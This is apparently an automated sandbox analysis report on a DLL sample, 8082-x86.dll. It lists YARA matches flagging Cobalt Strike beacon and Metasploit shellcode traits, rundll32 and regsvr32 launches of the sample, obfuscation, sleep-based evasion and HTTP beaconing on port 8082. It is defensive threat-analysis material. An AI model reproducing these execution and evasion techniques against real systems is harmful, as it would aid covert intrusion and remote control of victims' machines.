Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR	Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration

Tries to load missing DLLs

Source: C:\Windows\System32\loaddll32.exe	Section loaded: wwanmm.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953410	0_2_00953410
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009702D8	0_2_009702D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009614EB	0_2_009614EB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00966514	0_2_00966514
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973550	0_2_00973550
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00953541	0_2_00953541
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00973B20	0_2_00973B20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00972CD0	0_2_00972CD0

Found potential string decryption / allocating functions

Source: C:\Windows\System32\loaddll32.exe

Code function: String function: 00966ADC appears 37 times

Source: 8082-x86.dll	ReversingLabs: Detection: 87%
Source: 8082-x86.dll	Virustotal: Detection: 70%

Source: 8082-x86.dll

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009578FB _memset,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,FindCloseChangeNotification,

0_2_009578FB

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\8082-x86.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01

Source: classification engine

Classification label: mal100.troj.winDLL@14/0@0/1

Source: 8082-x86.dll

Static PE information: Image base 0x6bac0000 > 0x60000000

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE71FA push ss; ret	0_3_00CE720F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE13E7 push FFFFFFC0h; ret	0_3_00CE13F3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB4DA push esi; ret	0_3_00CEB4DD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB59F push esi; iretd	0_3_00CEB5FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CEB556 push esi; retf	0_3_00CEB59E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0527 push FFFFFF99h; ret	0_3_00CE0533
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE06D9 push eax; ret	0_3_00CE06E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE166C pushfd ; ret	0_3_00CE1672
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4668 push edi; ret	0_3_00CE4677
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0634 push eax; ret	0_3_00CE063D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07CD push ecx; ret	0_3_00CE07D4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07C4 push ecx; ret	0_3_00CE07CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE17DE push edx; ret	0_3_00CE17EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE078D push ecx; ret	0_3_00CE0797
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE179A pushfd ; ret	0_3_00CE17B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE07BB push ecx; ret	0_3_00CE07C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0756 push ecx; ret	0_3_00CE0764
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0766 push ecx; ret	0_3_00CE0770
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0774 push ecx; ret	0_3_00CE077F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE68E7 push esp; ret	0_3_00CE68EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE18A6 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1867 push FFFFFFC2h; ret	0_3_00CE1891
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE087E push edx; ret	0_3_00CE0887
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0834 push edx; ret	0_3_00CE0853
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0972 push ebx; ret	0_3_00CE0978
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE0917 push edx; ret	0_3_00CE091D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9ADA push FFFFFFC3h; ret	0_3_00CE9AF9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A91 pushad ; iretd	0_3_00CE1A93
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE1A7D pushad ; retf	0_3_00CE1A86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE4B84 push ebx; ret	0_3_00CE4B85

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49689

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Windows\System32\loaddll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31329	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 34974	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 31989	Jump to behavior

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE9004 mov eax, dword ptr fs:[00000030h]		0_3_00CE9004
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_3_00CE8374 mov eax, dword ptr fs:[00000030h]		0_3_00CE8374

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009558DD GetUserNameA,_strrchr,__snprintf,

0_2_009558DD

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: 8082-x86.dll, type: SAMPLE

ID:	780200
Product:	CloudBasic
Start time:	16:02:07
Start date:	08.01.2023
Sample:	8082-x86.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8d72fc6ff9cb0971df587d20dda5e8c8
SHA1:	d6031029133084901392b856fe66f00f438d95d9
SHA256:	0b7d19cf030839c3df481069772c7a32b5a3be4c41ce6b436ab69015fa90d98a
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Windows Analysis Report
8082-x86.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report 8082-x86.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
8082-x86.dll